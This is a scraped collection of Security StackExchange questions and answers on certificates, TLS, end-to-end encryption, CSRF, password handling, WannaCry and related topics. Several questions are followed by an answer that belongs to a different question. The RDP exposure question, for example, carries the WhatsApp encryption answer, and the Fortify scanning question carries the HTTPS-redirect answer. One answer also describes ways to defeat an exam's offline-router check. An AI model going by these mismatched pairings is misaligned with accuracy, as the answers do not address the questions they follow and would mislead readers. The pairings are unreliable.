country in which it is registered to appear in the browser like this: then there is significantly more cost to the CA. Before issuing an EV cert, the CA is required to have a human verify a whole pile of things about the legal status of your company. Things like: is your company legally registered under the name listed in the cert request? Is the person requesting the cert listed as a legal officer of the company in the company's registration documents? Is the DNS record for the requested website registered to the same company? etc. Why a recurring fee? The reason that CAs charge a recurring fee is the same reason that you can't get a 10 year SSL cert: the CA/Browser forum requires certs to expire and be completely re-validated every year or two. The security reasons for this are to force key rollover, to prevent the company from going bankrupt or changing name and a rogue sysadmin from continuing to use the cert nefariously, etc. The CA is required to do all this background checking not only on first time issuance, but also every time the cert is renewed. The added value for you is that your customers get a higher level of assurance in the trust-worthiness of your website (sure, 99% of consumers won't notice, but auditors and hackers certainly will!), and also, Google is moving towards giving higher search preference to sites with higher quality certs. This is why certs can cost hundreds of dollars per year; you are not just paying for a couple bits of data, you are paying for the time of the human who has to do the verification. OCSP servers There are also server costs for maintaining a cert, mainly the costs of OCSP , which requires the CA to maintain high-bandwidth, low-latency, zero-downtime servers for responding to revocation checks on each cert they issued. While this might not sound expensive, every web browser must ping a CA's OCSP server during every HTTPS page load. Every extra millisecond that the CA takes to respond adds to the page load time of every page on the internet . Running a low-latency server at this level of traffic is a tricky network engineering problem. [disclosure: I work for a CA] | {
"source": [
"https://security.stackexchange.com/questions/157175",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/90486/"
]
} |
157,243 | I just requested a CSR from my shared web hosting provider, to generate a certificate which I will send back to them to install. (The certificate itself is to be generated properly by an organisation I work for who can provide certificates for our official use.) The hosting company promptly sent me the CSR but also the private key! They even CC'd someone else, and it's in Gmail so Google has presumably already ingested it for advertising purposes. In my humble opinion this seems like a terrible thing to do. I am about to write back to them rejecting this one, and asking to renew the CSR and this time keep the private key - private. Before I make a fool of myself, I'd like to confirm that the private key for an "SSL" (TLS) certificate should never leave the server? I've been working in security-related industries for many years, and used to be a crypto programmer, so I feel I know the topic a little - but I know things change over time. I have read this related question: What issues arise from sharing a SSL certificate's private key? Meta Update: I've realised I've written a poor-quality question format for Stack Exchange - as it's now difficult to accept a specific answer. Apologies for that - all answers covered different and equally interesting aspects. I did initially wonder how to word it for that purpose but drew a blank. Update: I have followed this though with the host and they did "apologise for any inconvenience", promised to keep future private keys "safe" and issued me a new, different CSR. Whether it's generated from the same exposed private key I am currently unsure of. I now also wonder, as it's a shared host, if they've sent me the key for the entire server or if each customer/domain/virtual host gets a key pair. It's an interesting lesson how all the crypto strength in the world can be rendered null and void by a simple human error. Kevin Mitnik would be nodding. Update 2:
In response to an answer from user @Beau, I have used the following commands to verify the second CSR was generated from a different secret private key. openssl rsa -noout -modulus -in pk1.txt | openssl md5
openssl req -noout -modulus -in csr1.txt | openssl md5
openssl req -noout -modulus -in csr2.txt | openssl md5 The first two hashes are identical, the third is different. So thats good news. | If I were in your place I would refuse to accept this SSL certificate.
The reason for that is, if someone broke into either of the emails that received the private key, they would be able to download it, and then impersonate the server in different attacks on clients, like man in the middle or similar.
Also in the case that one of the receiving email addresses was written incorrectly, someone may already have the private key. There are also probably many more scenarios where this private key could be downloaded and used by an attacker. Also notifying the company about not sharing the private key should be important, to make sure that the company won't sent the private key anywhere else - the private key was sent to you, and some other CC's in this email, but you can not know whether the company didn't sent a separate email with the private key somewhere else. There is a reason why the private key is called a private key Please note that this is mostly my personal opinion, and that I am not an expert with SSL. | {
"source": [
"https://security.stackexchange.com/questions/157243",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/121341/"
]
} |
157,292 | I've been told that WhatsApp implemented "end-to-end" encryption. In the grand scheme of things, what does this actually mean versus, say, another service which does use HTTPS, such as this website (StackExchange) or some other non-end-to-end encrypted site? Is there some point where even HTTPS/TLS will expose data that doesn't occur in an end-to-end encrypted app like WhatsApp? | End-to-end is where the message is encrypted by the sender and decrypted by the receiver. Nobody in the middle, not the chat provider nor other entities have the ability to decrypt it. Compare this to a simple chat over HTTPS. Each message is encrypted in transit, just based on the fact that TLS is used. Now, while the intended recipient is another user, the TLS connection is initiated with a server (think Facebook). TLS terminates at the server, and whoever controls the server has the ability to view the messages since they are not encrypted end-to-end. Then, the message may be passed on encrypted over TLS again to the recipient. The key difference is that the provider is able to view the messages in this case. | {
"source": [
"https://security.stackexchange.com/questions/157292",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136795/"
]
} |
157,294 | I'm an absolute security nubile who wants to access his Windows desktop PC from his Mac laptop. I'd like to do this so I have all of my stuff in one place, and I also have some work documents stored on my personal PC that I'd like to access from the road. I discovered Microsoft RDP and thought it might fit the task, but I'm concerned about security implications, and some of my work documents being exposed to malicious do-no-gooders. I've made some changes to my RDP setup after a bit of searching, such as changing the RDP port to a random number, requiring authentication using NLA, and requiring SSL for incoming connections. I've also set up Duo TFA to be required on all RDP connections. My question is, if i set up port forwarding and expose myself to the internet, is this still a really bad idea? What other alternatives do I have? I did a bit of research on VPNs, but I couldn't really make sense of it all. I'd really appreciate your advise. | End-to-end is where the message is encrypted by the sender and decrypted by the receiver. Nobody in the middle, not the chat provider nor other entities have the ability to decrypt it. Compare this to a simple chat over HTTPS. Each message is encrypted in transit, just based on the fact that TLS is used. Now, while the intended recipient is another user, the TLS connection is initiated with a server (think Facebook). TLS terminates at the server, and whoever controls the server has the ability to view the messages since they are not encrypted end-to-end. Then, the message may be passed on encrypted over TLS again to the recipient. The key difference is that the provider is able to view the messages in this case. | {
"source": [
"https://security.stackexchange.com/questions/157294",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145653/"
]
} |
157,422 | I have a web application that has the following use case: User creates account with username and password -- hashed password is stored in database. User logs in (persists across sessions) -- login token is stored in cookie. User inputs and submits text data -- data is stored in database, but is sensitive and shouldn't be exposed even if database is compromised. Only the (logged in) user, and no one else, can read the submitted data. For convenience, user should not need to enter any passphrase to encrypt/decrypt the data. Is this feasible? How should the data be encrypted? | You can use a key derivation function to convert the user's password into an encryption key. Then you would use a cryptographically secure pseudorandom number generator to generate a separate key that would encrypt the user's data. You would then use the derived key to encrypt the generated key. The resulting ciphertext of the data encryption key could then be stored safely in the user table of your database (call the field "encryptedkey" if you like). In this way, the user's password will become the means to decrypt the user's encrypted key. The key that actually encrypts the data is only decrypted long enough to decrypt the data that it encrypted. You'll need to store that key in the session in order to avoid the need to ask the user for his password on each decryption occurance. Alternatively, you can store the key encryption key on a Key Management Service such as that offered by Amazon AWS. This way you would retrieve the key from Amazon over TLS using only a reference to the key. Of course in this case you will still need to store the authentication credentials for the KMS somewhere in your architecture, possibly in a remotely retrieved highly secured config file. Random Number Generator ⟶ Helps create Key #1. This key encrypts your data. It stays constant over time. You must generate this key when the user first registers. Use a CSPRNG (cryptographically secure pseudo-random number generator) to ensure sufficient randomness and unpredictability. Password ⟶ Converted into Key #2 with PBKDF2. This key, Key #2, is used to encrypt Key #1. You'll want to persist Key #2 in the user's session. Store the encrypted form of Key #1 in the user table, in a field called (perhaps) "encryptedkey". Changing passwords Whenever the user changes their password, you only have to execute step #2 again, rather than encrypting all of your data, all over again. Just convert the new password into a key (Key #2), re-encrypt Key #1, and overwrite the old value for the encrypted form of Key #1. Encrypting/decrypting data When the user has logged in, execute step #2. Once you have the password converted into a key, just decrypt Key #1. Now that you have Key #1 decrypted, you can use Key #1 to encrypt and decrypt your data. | {
"source": [
"https://security.stackexchange.com/questions/157422",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145806/"
]
} |
157,520 | If a hash algorithm has an option for selecting the output-hash-length (e.g., 128 vs. 512 bits), and all other aspects of the hash function are the same, which hash-length is probably more secure/useful, and why? | How Hashes work The concept behind hashes is very simple: take a message of arbitrary size, and deterministically produce a random-looking output of a given size. For a well-built cryptographic hash function, the only way to break it is to try random inputs until you get the hash value you want (collision or pre-image, etc). Which is more secure? All other thing being equal (ie it's the same algorithm, just with a different output size, ex.: SHA2-224 vs SHA2-512), then the larger the output of the hash, the more secure it is. Reason: if you have a 224-bit hash, then you expect an attacker to have to make 2 223 guesses (on average) to break it, whereas a 512-bit has requires the attacker to make 2 511 guesses (on average). Which is more useful? This one I can't answer for you, it depends on a lot of factors about the application that's using it. For example, whether you have memory, bandwidth, or processing constraints, whether you are able to easily upgrade your infrastructure if the 128-bit hash gets deprecated or if the solution you're setting up needs to be future-proof for 10 years, etc. With only the information you've given, I can't answer this for you. | {
"source": [
"https://security.stackexchange.com/questions/157520",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138656/"
]
} |
157,572 | I am setting up a new webserver. In addition to TLS/HTTPS, I'm considering implementing Strict-Transport-Security and other HTTPS-enforcement mechanisms. These all seem to be based on the assumption that I am serving http://www.example.com in addition to https://www.example.com . Why don't I just serve HTTPS only? That is, is there a security-based reason to serve HTTP -- for example, could someone spoof http://www.example.com if I don't set up HSTS? | Why don't I just serve https only? The main reasons are the default behavior of browsers and backward compatibility . Default behavior When an end-user (i.e, without knowledge in protocols or security) types the website address in its browser, the browser uses by default HTTP. See this question for more information about why browsers are choosing this behavior. Thus, it is likely that users will not be able to access your website. Backward compatibility It is possible that some users with old systems and old browsers do not support HTTPS or more likely, do not have an up-to-date database of root certificates , or do not support some protocols. In that case, they either will not be able to access the website or will have a security warning. You need to define whether the security of your end-users is important enough to force HTTPS. Many websites still listen to HTTP but automatically redirects to HTTPS and ignore users with really old browsers. could someone spoof http://www.example.com if I don't set up HSTS? If an attacker wants to spoof http://www.example.com , it needs to take control of the domain or take control of the IP address in some way. I assume you meant: could an attacker perform a man-in-the-middle attack? In that case yes, but even with or without HSTS: Without HSTS : An attacker can easily be in the middle of your server and the user, and be active (i.e, modify the content) or passive (i.e., eavesdrop) With HSTS : The first time a user try to visit the site using HTTP, an attacker could force the user to use HTTP. However, the attacker has a limited time window of when it can perform its attack. What you should do? Like many websites, you should allow HTTP connections and make you server redirects the user to the HTTPS version. This way you override the default behavior of browsers and ensure your users use the HTTPS version. Old systems without the proper protocols or root certificates will not be able to access the site (or at least will have a warning), but depending on your user base this should not be an issue. Conclusion It will do more harm than good to disable HTTP. It does not really provide more security. Any security added to protect a resource is useless if it prevents most of its users from accessing it. If your end-users cannot access your website because their browser default to HTTP and you do not listen for HTTP connections, what is the benefit? Just perform the HTTP 301 redirection to the HTTPS version. Related questions Why do browsers default to http: and not https: for typed in URLs? Why is HTTPS not the default protocol? Why should one not use SSL? Why do some websites enforce lack of SSL? | {
"source": [
"https://security.stackexchange.com/questions/157572",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7062/"
]
} |
157,579 | I am asked to integrate the code audit tool HP Fortify in our development process, but the main constraint about it is that the whole code should not be scanned every time: only the classes impacted by the last backlog item should be analyzed. We are using Jenkins and SonarQube, so I gave a look at the plugins available but couldn't find anything matching the requirements: do not scan the whole code everytime. Would you know any tool or HP Fortify configuration that could suit what I need? | Why don't I just serve https only? The main reasons are the default behavior of browsers and backward compatibility . Default behavior When an end-user (i.e, without knowledge in protocols or security) types the website address in its browser, the browser uses by default HTTP. See this question for more information about why browsers are choosing this behavior. Thus, it is likely that users will not be able to access your website. Backward compatibility It is possible that some users with old systems and old browsers do not support HTTPS or more likely, do not have an up-to-date database of root certificates , or do not support some protocols. In that case, they either will not be able to access the website or will have a security warning. You need to define whether the security of your end-users is important enough to force HTTPS. Many websites still listen to HTTP but automatically redirects to HTTPS and ignore users with really old browsers. could someone spoof http://www.example.com if I don't set up HSTS? If an attacker wants to spoof http://www.example.com , it needs to take control of the domain or take control of the IP address in some way. I assume you meant: could an attacker perform a man-in-the-middle attack? In that case yes, but even with or without HSTS: Without HSTS : An attacker can easily be in the middle of your server and the user, and be active (i.e, modify the content) or passive (i.e., eavesdrop) With HSTS : The first time a user try to visit the site using HTTP, an attacker could force the user to use HTTP. However, the attacker has a limited time window of when it can perform its attack. What you should do? Like many websites, you should allow HTTP connections and make you server redirects the user to the HTTPS version. This way you override the default behavior of browsers and ensure your users use the HTTPS version. Old systems without the proper protocols or root certificates will not be able to access the site (or at least will have a warning), but depending on your user base this should not be an issue. Conclusion It will do more harm than good to disable HTTP. It does not really provide more security. Any security added to protect a resource is useless if it prevents most of its users from accessing it. If your end-users cannot access your website because their browser default to HTTP and you do not listen for HTTP connections, what is the benefit? Just perform the HTTP 301 redirection to the HTTPS version. Related questions Why do browsers default to http: and not https: for typed in URLs? Why is HTTPS not the default protocol? Why should one not use SSL? Why do some websites enforce lack of SSL? | {
"source": [
"https://security.stackexchange.com/questions/157579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/111988/"
]
} |
157,627 | I’ve heard about a rule in Information Security, that once a hacker has access to your physical machine, then it’s all over. However, there seems to be a big exception to this rule: iPhones. It was all over the news a while back that the CIA (or the FBI or something) could not access information from a terrorist’s phone for their counter-terrorism ops. They had to ask Apple to create them an unlocking program that could unlock the phone for them. My question is, why are iPhones so hard to hack? | I don't think that you interpret the rule you've heard in the right way. If an attacker has physical access to an encrypted but switched off device he cannot simply break the encryption provided that the encryption was done properly. This is true for an iPhone as much as it is for an fully encrypted notebook or an encrypted Android phone. The situation is different if the device is not switched off, i.e. the system is on and the operating system has access to the encrypted data because the encryption key was entered at startup. In this case the attacker might try to use an exploit to let the system provide him with the decrypted data. Such exploits are actually more common on Android mainly because you have many vendors and a broad range of cheap and expensive devices on this system vs. only few models and a tightly controlled environment with iPhones. But such exploits exist for iPhone too. With physical access it would also be possible to manipulate the device in a stealthy way in the hope that the owner does not realize that the device was manipulated and enters the passphrase which protected the device. Such manipulations might be software or hardware based keyloggers or maybe some transparent overlay over the touchscreen which captures the data or similar modifications. This can be done both for switched off and switched on devices but a successful attack requires that the owner is unaware of the changes and will thus enter the secret data into the device. Such attack is also often called evil maid attack since it could for example be done by the maid if one leaves the device in the hotel room. | {
"source": [
"https://security.stackexchange.com/questions/157627",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132382/"
]
} |
157,984 | I'm a complete noob when it comes to these subjects. But here goes... Let's say someone is using a VPN, TOR, or some other tool to enhance their privacy. As I understand it, you are discouraged from using plugins, various apps, and other things as it may compromise your privacy. Does this extend to anti-virus/virus protection as well? If someone such as a hacker or the NSA didn't want to try to crack through your VPN or anything to get your info, could they target your anti-virus/virus protection to get to your info. If not, then is it safe to use anti-virus/virus protection if you are concerned with your privacy and also use VPN/TOR? | Any software you install on your system can compromise the system and thus affect security and privacy. This can be done either willingly or because of bugs in the software. And this is doubly true for software which runs with elevated privileges, like Antivirus usually do. And while Antivirus might like to protect you they often have critical bugs which might make your system actually less secure. For more information read High-severity bugs in 25 Symantec/Norton products imperils millions from 2016, Critical flaw in ESET products shows why spy groups are interested in antivirus programs from 2015, Google bod exposes Sophos Antivirus' gaping holes from 2012 or Google researcher blasts Trend Micro for massive Antivirus security hole from 2016, just to name a few. Apart from that many Antivirus inspect HTTPS connections since encrypted connections are also used to transfer malware. And sometimes they implement this inspection in a wrong way and thus make man in the middle attacks possible which were not possible before. Read The Security Impact of HTTPS Interception for more details. | {
"source": [
"https://security.stackexchange.com/questions/157984",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/146505/"
]
} |
158,045 | Is it possible to prevent CSRF by checking the Origin and Referer headers? Is this adequate, provided that requests with neither are blocked? | Expanding on the answers of @Sjoerd and @lindon. Origin vs Referer vs CSRF token Most likely, the reason OWASP recommends also using a CSRF token, is that at the time when this recommendation was made - a significant portion of browsers did not yet support the Origin header. This is no longer the case, but people are chimpanzees . In order to preserve privacy, any browser request can decide to omit the Referer header. So it is probably best to only check the Origin header. (In case you want to allow for users to preserve their privacy) The Origin header is null in some cases .
Note that all of these requests are GET requests, which means they should not have any side effects. As long as you make sure the malicious website sending the requests with your browser cannot read the responses, you should be fine. This can be ensured using proper CORS headers. (Do not use Access-Control-Allow-Origin: * !) To prevent "click-jacking", set the header X-Frame-Options: DENY . This will tell your browser that it is not allowed to display any part of your website in an iframe. The "new" approach Setting Cookie properties SameSite=lax or SameSite=strict will prevent CSRF attacks. This is a quite new feature though, and cannot be used alone, simply for the reason that not all common browsers support it yet. You can track support HERE . When the browsers do, people will likely still recommend checking Origin/Referer/CSRF tokens. If they do - without giving a good reason, it is likely because they are chimps. | {
"source": [
"https://security.stackexchange.com/questions/158045",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53622/"
]
} |
158,075 | According to the OWASP Auth Guidelines , "An application should respond with a generic error message regardless of whether the user ID or password was incorrect. It should also give no indication to the status of an existing account." However, I have found that many popular web apps violate this guideline by showing a message that the account does not exist. So what is going on here? Are Google, Microsoft, and Slack doing something insecure or is the OWASP Guideline useless? | This is a consideration between security and usability, and therefore there is not really a right answer here. So here follows my opinion. If you can keep usernames secret, then do so. In this case there is no way to figure out whether a username exists, and the login reacts the same whether a user exists or not. Note that this also means taking the same amount of time to return an error message. This behavior may not be possible. For example if users can register themselves and choose their own username, you have to notify them when a username already exists in the system. If this is the case, make the login as easy to use as possible by providing the most detailed error message. If someone can figure out whether a user exists using the registration function, there is no use in hiding this at the login. | {
"source": [
"https://security.stackexchange.com/questions/158075",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11536/"
]
} |
158,126 | I know that the browser's default protocol to access any site is http:// when https:// is explicitly not mentioned, but even then if we browse to a website say www.facebook.com , the response header from the Facebook servers would have HSTS mentioned and our browser would direct us from http:// to https:// so why do we need another plugin to do this when browser itself does this for the user? What is the purpose of HTTPS Everywhere when our browser does it's job by default. | HSTS uses a Trust on First Use model. If your first connection to the site was already compromised, you may not receive an HSTS error on subsequent requests. The HTTPS Everywhere plugs this hole, by letting your browser know that the site is an HTTPS only site from the first connection. Also, some websites don't advertise an HSTS header even when they support HTTPS. Or they may have their HTTPS be in a different domain/path (e.g. http://www.example.com but https://secure.example.com ), HTTPS Everywhere attempts to help with these situations by rewriting the site's URLs. | {
"source": [
"https://security.stackexchange.com/questions/158126",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/118511/"
]
} |
158,224 | A friend of mine is taking a UNIX systems class and mentioned to me that when they take exams they do so on their computers. That is all students are using their own computer/laptop. Students are not being provided a computer by the professor. In an attempt to prevent cheating and googling of the answers, all student's are required to connect to a router that the professor has set up in order to take the exam. This router is not connected to the internet. If anyone disconnects from the router during the exam time the professor then knows that they were potentially trying to use the internet. Apparently he has told his class that this system is "foolproof" and is so confident in its ability to prevent student network access he often leaves the room during the exam. I admit that I'm not particularly well versed in this area of networking but theoretically couldn't this safeguard be defeated by using something resembling a man in the middle attack. You spoof a MAC address and IP and send that to the target router, which then thinks you are connected even though there is no real connection? Or is this problem network card based, where the vast majority of computers only have 1 wifi card and can therefore only do network related tasks for 1 network at a time. | Well, obviously it's not "foolproof" . Depending on your capabilities, there are plenty of ways to cheat. Your professor has a point in that your standard wireless network card won't simply support a simultaneous connection to multiple different APs, thus preventing your from using that particular interface for an Internet connection. (Although with some tinkering you could possibly alternate between networks without letting the professor's AP take notice by tweaking your driver to omit the layer-2 management frames that are supposed to notify the AP of your intent to dis-/reassociate.) However, there are also easy workarounds: Build in a second network adapter (or plug in an external USB one, once the professor leaves) to connect to a network with Internet access. You can easily do this without interrupting your existing connection. Connect with your phone or another device instead of your real computer. On that device you can configure the broadcasted MAC address to match the one of your computer. This could fool your professor but probably wouldn't withstand a forensic investigation of the traffic. Use Bluetooth. Most laptops have built-in BT, so you could just tunnel your traffic via BT to a hidden device that itself is connected to the internet. Get creative. There are plenty of ways to bridge an apparent air gap. You might use your sound card to transmit data in a small range (or even your hard drive for that matter) - but then again you could also spend that time studying for the exam. One effective countermeasure might be capturing every student's screen during the exam, but personally I find that very intrusive. Ultimately, if the professor allows students to use their own computers there will always be some way to prepare the devices to cheat. | {
"source": [
"https://security.stackexchange.com/questions/158224",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/146774/"
]
} |
158,228 | When making complex passwords backlashes and forward slashes are often not allowed. I assume this has to do with errors it probably generates with the db which might not recognize it but I'm not sure. What is the reason for limiting passwords from using backlashes and forward slashes | Well, obviously it's not "foolproof" . Depending on your capabilities, there are plenty of ways to cheat. Your professor has a point in that your standard wireless network card won't simply support a simultaneous connection to multiple different APs, thus preventing your from using that particular interface for an Internet connection. (Although with some tinkering you could possibly alternate between networks without letting the professor's AP take notice by tweaking your driver to omit the layer-2 management frames that are supposed to notify the AP of your intent to dis-/reassociate.) However, there are also easy workarounds: Build in a second network adapter (or plug in an external USB one, once the professor leaves) to connect to a network with Internet access. You can easily do this without interrupting your existing connection. Connect with your phone or another device instead of your real computer. On that device you can configure the broadcasted MAC address to match the one of your computer. This could fool your professor but probably wouldn't withstand a forensic investigation of the traffic. Use Bluetooth. Most laptops have built-in BT, so you could just tunnel your traffic via BT to a hidden device that itself is connected to the internet. Get creative. There are plenty of ways to bridge an apparent air gap. You might use your sound card to transmit data in a small range (or even your hard drive for that matter) - but then again you could also spend that time studying for the exam. One effective countermeasure might be capturing every student's screen during the exam, but personally I find that very intrusive. Ultimately, if the professor allows students to use their own computers there will always be some way to prepare the devices to cheat. | {
"source": [
"https://security.stackexchange.com/questions/158228",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81532/"
]
} |
158,239 | I have a web application and I have implemented a check on the browser to ensure that a user sets only strong passwords.
A company that we have called to check security vulnerabilities pointed out that this is not enough because using some hacking a user can ignore the check and set a weak password. I do not understand how this can be a security vulnerability.
Why would someone hack the security check just to set a weak password?
Someone expert enough to hack the web application will understand the importance of using a strong password. The only reason I can think is that someone, very very lazy, can decide to hack the check just to have an easier password to remember. I do not know how likely is this case. I know that you cannot enforce a strong password on the client side and that if you are required to have a strong password in any circumstance, you have to do it on the server side. My point is: given that, to have an acceptable user experience, we have to do the check on the client side, there has to be a good reason, a real use case that creates a possible vulnerability to justify a duplication of the check on the server side. Reading the answers, so far, it seems that the only use case that can create a vulnerability is when the javascript does not work. This does not seem a problem for me because the submit button is disabled by default. | You’re assuming that the check is bypassed on purpose. It could be the case that someone is using a browser which fails to handle the script properly or with scripts disabled, possibly even without knowing this. You seem to have a reason for people to use strong passwords. If you do so, why accept that people can bypass it? Client-side validation can be helpful from a usability perspective, but if you decide that a minimum password strength is required, you should enforce it by implementing it server-side. | {
"source": [
"https://security.stackexchange.com/questions/158239",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95908/"
]
} |
158,559 | Say I had a database that looked like this: Name Password hash (bcrypt) Status
--------------------------------------------------------------------------------
Dave $2y$10SyyWTpNB.TyWd3nM hQ41frOtObcircAb3nJw1Cf9dC6CT7tVIEb6XS Standard
Sarah $2y$10$fUJrNA200sXgWUJAP7XEiuq4itHa43Y8QVIpc/YWscgVJ PYWbLLV. Admin
Mike $2y$10$01jx7u7hnfKOzBYyjNWskOPQ23w1Cf1gNiv42wsKqXKOf8filzS02 Standard If an attacker gained access to this database, then they would immediately see that Sarah is an admin, and would probably focus on breaking that password, so they could have more power. Is there any way I could somehow hide whether or not someone is an admin in the database so that an attacker would not know who the admins are? I could simply hash the value (standard or admin) but that would only give 1 bit of entropy, and I would hope to get a bit more security than that. | I would say this is a bit too much trouble considering what you get out of it. I think when the attacker has access to the database you have way bigger problems. Obfuscating the admin status of a user will just cost the attacker some extra time, but an APT (Advanced Persistent Threat) would probably not be deterred by this fact. | {
"source": [
"https://security.stackexchange.com/questions/158559",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132382/"
]
} |
158,655 | Most of our publishers sell subscriptions to institutions and people get access by being identified as part of the institution.
This institution authentication happens with IP ranges or Shibboleth, but not all institutions support Shibboleth or other SAML, and IP ranges do not help without VPN or proxy server. So, publishers want us to devise a scheme by which a user will gain short term access to his institutional holding (that is, to the content subscribed by his institution) while he is outside the IP range of the institution (e.g. at home or traveling.) The solution needs to be as simple as possible for the user, it should not require that they download anything and it should work well for users coming from mobile phones or from their laptops. The process could require that the users initiate this access while inside the IP range, but ideally, they should be able to initiate their 30 day access even if they are away from the institution and forgot to set it up. In particular, please state how the user will assert that he is a member (faculty, student, employee, whatever) of the institution that he claims. Remember, that the institution has no authentication server and will not install one. Also, the user will not install an application on his computer.
The complete solution will invariably involve a persistent cookie at some point. How would you prevent someone from selling his persistent cookie to someone who is not an institution member and wants to gain access? | Can you prevent someone from selling their password to get similar access? Do you think you need to? It's pretty much equivalent. Do you need to do this? From my experience being inside/outside academic institutions with journal access, there's always some amount of sharing resources as a favour (e.g. "hey, could you send me a PDF of this paper?"). You'll never be able to stop that, because it is actually being manually accessed by a legitimate user on a correct machine. However, I have personally never witnessed student/staff trying to make money from this. Monitoring Even if they wanted to make money like this, then I don't think sharing cookies is the best way - it's certainly not how I'd do it! Protections you could add to the cookie system (e.g. fingerprinting the user's browser and checking it stays the same, etc.) won't apply to other methods. Instead (if this is actually a problem), a reasonable and robust solution is to monitor user's usage patterns. If they are downloading 100x the resources of anyone else, or if they fetch resources consistently for 250 hours straight (the longest humans can survive without sleep), then there's probably multiple users or an automated system at work. However, this monitoring solution doesn't have to be included from the beginning, it can be added in later - and until you have evidence that it's actually a problem, I think it should be quite far down your list of things to do. | {
"source": [
"https://security.stackexchange.com/questions/158655",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/147294/"
]
} |
158,769 | I am interested in watermarking a video for copyright purposes. The requirements are as follows: The watermark must be barely noticeable to the naked eye. The watermark must be able to be extracted from a device such as a smartphone camera. Embedding a secret message where the raw data is available is fairly simple. It seems much harder when the data must me extracted from an external source where the details of the pixels are easily lost. Is this a hopeless effort? | Your use case calls for a robust watermarking scheme. It has to resists compression and uncompression of the image, has to resist modification (e.g. white balance changes, lost pixels) and also geometrical variation due to the hand-held device capture not being perfect. Robustness usually comes at the expense of invisibility and capacity. Since there is a need for identification and the robustness requirements are really strong, you are unlikely to find a scheme that respects all your demands given the current state of the art. As a reference: A Survey of Digital Watermarking Scheme ( Google cache ). | {
"source": [
"https://security.stackexchange.com/questions/158769",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/147410/"
]
} |
159,331 | There's a new strain of attacks which is affecting a lot of systems around the world (including the NHS in the UK and Telefonica in Spain) which is being called "WannaCry" amongst other names. It seems to be a both a standard phishing/ransomware attack but it's also spreading like a worm once it gets into a target network. How is this malware compromising people's systems and what's the best way for people to protect themselves from this attack? | WannaCry attacks are initiated using an SMBv1 remote code execution vulnerability in Microsoft Windows OS. The EternalBlue exploit has been patched by Microsoft on March 14 and made publicly available through the "Shadowbrokers dump" on April 14th, 2017. However, many companies and public organizations have not yet installed the patch to their systems. The Microsoft patches for legacy versions of Windows were released last week after the attack. How to prevent WannaCry infection? Make sure that all hosts have enabled endpoint anti-malware solutions. Install the official Windows patch (MS17-010) https://technet.microsoft.com/en-us/library/security/ms17-010.aspx , which closes the SMB Server vulnerability used in this ransomware attack. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Make sure MS17-010 patches are installed. Backup all important data to an external hard drive or cloud storage service. More information here: https://malwareless.com/wannacry-ransomware-massively-attacks-computer-systems-world/ | {
"source": [
"https://security.stackexchange.com/questions/159331",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
159,379 | A person has a form that asks for a name and password. The password is sent to the server where a hash is created from hashing the name and password. This hash is converted into a number using the ascii value. The number is limited to 10 digits, and is used to seed a random number generator. Three random numbers are generated from 1-77616. These numbers are used to select words from a list of 77616 English words. The three words formed are used as the persons username. 77616^3 is roughly 2^48, so the probability of a collision after a million username generations should be ~0.001774778278169853. Does this seem like a secure way to manage users, that way a login/register system doesn't have to be implemented? Is there any benefit of using this kind of system over a traditional login/register system? | No, this doesn't seem secure. Collisions Mersenne Twister is a deterministic RNG, so it's not suitable for most cryptographic tasks (although it's usage makes sense, because if it weren't deterministic, your approach would of course not work). In this case, collisions would not happen at the stage you assume and base your calculations on. Instead, they would happen when you limit the ascii value to 10 digits, so the probability of collisions is way higher than you assume. Comments on Approach What you have is basically a home-made hashing function. You take some input, you apply some function(s) to it, and receive a fixed-length (3 words) output. The input space is larger than the output space, and it is impossible to reverse the procedure (get the password from the three stored words). Don't roll your own and Don't be a Dave apply. To properly hash passwords, see How to securely hash passwords? . You are still implementing a login and registration system (a user needs to enter username and password, you store it in some form, and can then later compare the stored value to newly entered values to authenticate the user). If you would stop at this step: "The password is sent to the server where a hash is created", you would have an ordinary process. But instead, you add additional steps, which do not increase, but decrease, security. | {
"source": [
"https://security.stackexchange.com/questions/159379",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148184/"
]
} |
159,397 | After reading this question , now, I am wondering if WannaCry malware can infect Linux OS especially Ubuntu. One of the answers talked about SMB2 and windows. Does it mean a Linux based computer is safe? (Beside the side effects, Wine, and being a conveyor) | WannaCry exploits a set of flaws in Microsoft's implementation of the SMB1 protocol. Since these are implementation flaws rather than structural flaws in the protocol itself, Linux systems cannot be automatically infected, but can be if manually installed. This is true regardless of if the systems are running Samba, Wine, or any other Windows-emulation layer. | {
"source": [
"https://security.stackexchange.com/questions/159397",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148209/"
]
} |
159,445 | I would prefer that no one, even me, could encrypt my files. I have no use for it, and don't want it. Is there a way to permanently disable any sort of encryption at the OS level? If not, is this a possible improvement that a future file system could incorporate? Or is it fundamentally impossible to prevent? | Read-only file systems can by definition not be written to (At least not digitally. What you do with a hole puncher and a neodymium magnet is your own business). Examples: Live CDs, from which you can boot into an operating system which will look the same on every boot. WORM (Write Once Read Many) devices, used for example by financial institutions which have to record transactions for many years with no means of altering or deleting them digitally. Writable partitions mounted as read-only. This can of course be circumvented by a program with root access. Versioning file systems would be more practical, but are not common. Such systems might easily include options to transparently write each version of a file (or its difference from the previous version) to a WORM device or otherwise protected storage. Both of these solve the underlying issue: Not losing the original data in case of encryption by malicious software. | {
"source": [
"https://security.stackexchange.com/questions/159445",
